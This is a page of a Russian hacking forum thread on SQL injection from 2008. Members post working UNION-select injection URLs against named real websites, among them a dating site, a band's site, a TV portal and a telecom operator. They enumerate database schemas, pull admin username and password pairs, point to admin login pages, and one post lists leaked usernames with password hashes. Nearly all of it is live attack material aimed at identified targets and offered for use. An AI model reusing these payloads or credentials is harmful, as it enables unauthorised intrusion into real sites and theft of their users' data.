ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 679 из 1242 « Первая < 179579629669 675 676 677 678 679 680 681 682 683 6897297791179 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6781  
Старый 03.11.2008, 17:48
Аватар для xPriZrAkx
xPriZrAkx
Познающий
Регистрация: 16.03.2007
Сообщений: 48
Провел на форуме:
293334

Репутация: 39
По умолчанию
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23+from+informati on_schema.tables--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23+from+informati on_schema.columns+where+column_name+like+0x25656d6 1696c--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x6368616e6765 5f656d61696c--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6368 616e67655f656d61696c+limit+0,1--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x646174696e67 5f626c6f636b6d61696c--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6461 74696e675f626c6f636b6d61696c+limit+0,1--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x646174696e67 5f617374726f6c6f6779--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6461 74696e675f617374726f6c6f6779+limit+0,1--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x646174696e67 5f636f756e747279--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6461 74696e675f636f756e747279+limit+0,1--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,userna me,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23+from+dating_adminmembers--

information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.VIEWS
information_schema.USER_PRIVILEGES
information_schema.TRIGGERS
information_schema.TABLE_PRIVILEGES
information_schema.TABLE_CONSTRAINTS
information_schema.TABLES
information_schema.STATISTICS
information_schema.SCHEMA_PRIVILEGES
information_schema.SCHEMATA
information_schema.ROUTINES
information_schema.KEY_COLUMN_USAGE
information_schema.COLUMN_PRIVILEGES
information_schema.COLUMNS
information_schema.COLLATION_CHARACTER_SET_APPLICA BILITY

datingfunda.dating_astrology
astro_id
astro_name
astro_desc
astro_start_date
astro_end_date

datingfunda.dating_blockmail
blockmail_id
blocker_id
blocked_id
doe

datingfunda.dating_country
country_id
country_name

datingfunda.dating_astro_comp
datingfunda.dating_album_photos
datingfunda.dating_album
datingfunda.dating_adminmembers
id
username
password
usertype
valid
lastlogin

Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,userna me,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23+from+dating_adminmembers--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,userty pe,lastlogin),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23+from+dating_adminmembers--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,lastlo gin),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23+from+dating_adminmembers--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,new_email,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23+change_ email--
datingfunda.change_email
member_id
old_email
new_email
membercode
valid

Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(old_email), 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+ from+change_email--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(new_email), 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+ from+change_email--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(membercode) ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 +from+change_email--
Цитата:
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(valid),6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from +change_email--
Схватил скуль в давнишней теме, и решил ее дальше раскрутить и мыла стащить все 50к, но перехотелось .
А самый прикол что в Админке показывает что 50к мыл, а вот в базе тольок 72 мыла ))
Всю базу перерыл...
Последний раз редактировалось xPriZrAkx; 03.11.2008 в 18:06..
 
Ответить с цитированием

  #6782  
Старый 04.11.2008, 00:30
Аватар для tromlen
tromlen
Новичок
Регистрация: 23.08.2007
Сообщений: 4
Провел на форуме:
73032

Репутация: 4
По умолчанию
to xPriZrAkx намекни где админка
 
Ответить с цитированием

  #6783  
Старый 04.11.2008, 02:15
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Тут Официальный сайт группы "Ляпис Трубецкой" не было ?


Код:
http://www.lyapis.com/ photo.php? cl=18+union+select+1,2,3,4,concat(user(),0x3a,version())--

Будет *)

Database Version: 5.0.67-community
Database name: lyapis_lyapis
User name: lyapis_lyapis@localhost

Таблицы:

access
adminhelp
administrator
adminlog
adminmessage
adminutil
announcement
announcementread
attachment
attachmentpermission
attachmenttype
attachmentviews
avatar
bbcode
calendar
calendarcustomfield
calendarmoderator
calendarpermission
cpsession
cron
cronlog
customavatar
customprofilepic
datastore
deletionlog
editlog
event
externalcache
faq
forum
forumpermission
forumread
holiday
icon
imagecategory
imagecategorypermission
infraction
infractionban
infractiongroup
infractionlevel
language
mailqueue
moderation
moderator
moderatorlog
passwordhistory
paymentapi
paymentinfo
paymenttransaction
phrase
phrasetype
plugin
pm
pmreceipt
pmtext
podcast
podcastitem
poll
pollvote
post
posthash
postindex
postparsed
product
productcode
productdependency
profilefield
profilefieldcategory
ranks
regimage
reminder
reputation
reputationlevel
rssfeed
rsslog
search
session
setting
settinggroup
sigparsed
sigpic
smilie
stats
strikes
style
subscribeevent
subscribeforum
subscribethread
subscription
subscriptionlog
subscriptionpermission
tachyforumpost
tachythreadpost
template
templatehistory
thread
threadrate
threadread
threadredirect
threadviews
upgradelog
user
useractivation
userban
userfield
usergroup
usergroupleader
usergrouprequest
userlist
usernote
userpromotion
usertextfield
usertitle
word
albums
anonses
articles
content
email
email2send
galleries
metatags
news
news_settings
newsletter
pictures
users_cp

Извиняюсь если что-то не так я новенький в этом.....
 
Ответить с цитированием

  #6784  
Старый 04.11.2008, 03:29
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
http://www.chattel.us/projects/details_content.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a3a,username,password),13+from+users+limit+0,1--
http://www.chattel.us/admin/
 
Ответить с цитированием

  #6785  
Старый 04.11.2008, 03:32
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Код:
http://www.alivaria.by/ru/catalogue/8.html?template=20+un ion+select+1,2,version(),4,version()+limit+1,1--
5.0.51a-community-log
alivaria_cms@localhost
alivaria_cms
 
Ответить с цитированием

  #6786  
Старый 04.11.2008, 15:11
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Цитата:
Сообщение от tromlen  
to xPriZrAkx намекни где админка
http://www.datingfunda.com/webadmin/login.php
 
Ответить с цитированием

  #6787  
Старый 04.11.2008, 15:59
Аватар для prescott
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию
СтримТВ

Код:
http://tv.stream.ru/programs/channel/?ch_id=999999999999999+union+select+version(),2,concat_ws(0x3a3a,login,password)+from+user+limit+10,1--%20&dws=2
Логинов почему то в таблице мало и в стандартную авторизацию они не проходят, следовательно либо таблица неактуальная, либо это логины манагеров

properm - достаточно крупный Пермский портал.

Код:
http://weather.properm.ru/-1+union+select+version(),version(),USER(),4+from+information_schema.tables--%20.html
 
Ответить с цитированием

  #6788  
Старый 05.11.2008, 17:03
Аватар для Snap
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию
www.lancktelecom.ru

«ЛАНК Телеком» — один из ведущих операторов Санкт-Петербурга, обеспечивающий полный комплекс телекоммуникационных услуг для частных лиц и корпоративных пользователей:

http://www.lancktelecom.ru/news/actions/id20498989+union+select+1,concat(name,char(58),pas sword),3,4,5,6,7,8+from+users/*

http://www.lancktelecom.ru/admin/index.php
=))
Последний раз редактировалось Snap; 05.11.2008 в 17:06..
 
Ответить с цитированием

  #6789  
Старый 06.11.2008, 01:45
Аватар для dim_on
dim_on
Новичок
Регистрация: 29.10.2008
Сообщений: 9
Провел на форуме:
33175

Репутация: 12
По умолчанию
оффтопик можно?

Насколько опасно скулю без проксика делать? если я не собираюсь ломать, а попрактиковаться только хочу.
 
Ответить с цитированием

  #6790  
Старый 06.11.2008, 15:47
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
настолько,наскольо они смотрят за серваком...месяцок поживешь на изжоге, если не придут - повезло, придут - неповезло =))


Цитата:
http://www.shell-shocked.org/article.php?id=284'
Цитата:
Dbname: god_shellshocked
Version: 4.1.22-standard
Username: god_shellshocked@localhost
admin
news
user

---user:
ravi:1f7ea163765f995726dfc2674a54004c
cypress:b294bec518451f85dcca77d244cafaae
verbalshadow:cc5290657d39d0f877902895b9426101
rmaharaj:da5f05e5a77b8ddb8fb308eeab603575
sparkane:71ccd01324a8134cec8164137e6861fc
 
Ответить с цитированием
Ответ
Страница 679 из 1242 « Первая < 179579629669 675 676 677 678 679 680 681 682 683 6897297791179 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ